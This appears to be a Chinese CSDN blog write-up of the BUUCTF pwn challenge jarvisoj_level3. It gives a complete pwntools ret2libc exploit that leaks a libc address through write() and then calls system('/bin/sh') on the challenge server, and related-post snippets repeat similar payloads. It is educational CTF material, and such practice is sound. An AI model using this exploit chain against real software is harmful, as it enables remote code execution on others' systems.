[BUU-WP]jarvisoj_level3

最新推荐文章于 2024-07-11 19:14:54 发布
最新推荐文章于 2024-07-11 19:14:54 发布
阅读量778 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121469827
版权
本文详细分析了一道CTF竞赛中的栈溢出题目,通过checksec工具确认了栈不可执行的保护措施。利用ida逆向工程发现漏洞函数,通过write函数泄露libc地址,然后计算system和/bin/sh的地址,最终构造payload实现ret2libc攻击,成功获取shell。
摘要由CSDN通过智能技术生成

jarvisoj_level3

使用checksec查看:
在这里插入图片描述

只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧:
在这里插入图片描述

主函数中直接给了漏洞函数,跟进去查看:
在这里插入图片描述
read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出

但这道题没有system/bin/sh,一道标准的ret2libc

write函数泄露libc地址,找system/bin/sh

exp:

from pwn import *

#start 
r = remote("node4.buuoj.cn",28172)
# r = process("../buu/jarvisoj_level3")
elf = ELF("../buu/jarvisoj_level3")
libc = ELF("../buu/ubuntu16(32).so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

#attack 
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendlineafter(b"Input:\n",payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter(b"Input:\n",payload)

r.interactive()
m0sway
关注
专栏目录
Jarvis OJ--level3
Kni9hT's Blog
11-10 251
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 692
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
jarvisoj_level3
m0_52231248的博客
11-17 660
jarvisoj_level3 Checksec: Ida: 标准的ret2libc,offest=0x88+4 有write和read的plt地址 Exp: from pwn import* from LibcSearcher import* r=remote("node4.buuoj.cn",26088) elf=ELF('./level3') context.log_level = 'debug' payload=flat('a'*0x88+'bbbb') payload+=
jarvisoj_level3_x64解题
最新发布
2301_81504456的博客
07-11 398
X64系统中程序参数前六个保存在寄存器中。
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1264
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 165
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
BUUCTF jarvisoj_level3
红叶的博客
10-27 383
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
BUUCTF_jarvisoj_level1
qq_39869547的博客
02-06 994
和原题的差别在于,远程不回显栈地址。直接常规栈溢出即可 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * from LibcSearcher import * elf = ELF("./level1") shellcode = asm(shellcraft.sh()) io = remote("node3.buuoj.c...
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
buu-[WUSTCTF2020]level4
qaq517384的博客
03-14 3157
64位elf文件 先运行 Traversal type 1:2f0t02T{hcsiI_SwA__r7Ee} Traversal type 2:20f0Th{2tsIS_icArE}e7__w Traversal type 3: //type3(&x[22]); No way! ida查看字符串无恙 查看main函数 int __cdecl main(int argc, const char **argv, const char **envp) { puts("Practice m
buu-[WUSTCTF2020]level3
qaq517384的博客
03-07 249
64位GCC 查看字符串,base甩脸上 看一眼main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char v3; // ST0F_1 const char *v4; // rax char v6; // [rsp+10h] [rbp-40h] unsigned __int64 v7; // [rsp+48h] [rbp-8h] v7 = __readfsqword(0x28u);
BUUCTF】jarvisoj_level3
m0_51251108的博客
12-28 363
BUUCTF】jarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 320
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
jarvisoj level3
sun的博客
10-03 1049
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
jarvis oj level3
CNXBDSa的博客
07-27 401
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
jarvisoj_level3 [r2libc]
、moddemod
06-24 307
exp from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './level3' p = process(proc_name) # p = remote('node3.buuoj.cn', 28793) elf = ELF(proc_name) main_addr = elf.sym['main'] write_plt = elf.plt['write'] write_got = elf..
jarvisoj_level3_x64
m0sway的博客
11-26 606
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3的x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 950
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值